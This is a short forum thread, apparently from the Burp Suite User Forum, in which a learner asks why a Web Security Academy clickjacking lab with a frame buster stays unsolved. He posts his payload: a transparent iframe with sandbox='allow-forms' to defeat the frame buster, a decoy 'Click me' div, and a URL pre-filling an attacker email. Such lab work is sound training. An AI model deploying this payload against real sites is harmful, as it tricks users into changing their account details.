The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Clickjacking with a frame buster script proving problematic

Garth | Last updated: Jul 08, 2024 07:51PM UTC

I have tried several browsers, and read other issues on the clickjacking labs. Despite having the email planted and the correct iframe attribute annnnnnd the "Click me" right on top of "Update Email" this one does not want to be solved. <style> iframe { position:relative; width:500px; height: 700px; opacity: 0.0001; z-index: 2; } div { position:absolute; top:450px; left:70px; z-index: 1; } </style> <div>Click me</div> <iframe sandbox="allow-forms" src="https://0a1a004203e307cb854df53800b300f7.web-security-academy.net/my-account?id=wiener&email=moose@attacker-moose.com"></iframe> What did I miss?

Garth | Last updated: Jul 08, 2024 08:03PM UTC

Note that the id= is not in many of the attempts I used. This was just the latest one.

Garth | Last updated: Jul 08, 2024 08:30PM UTC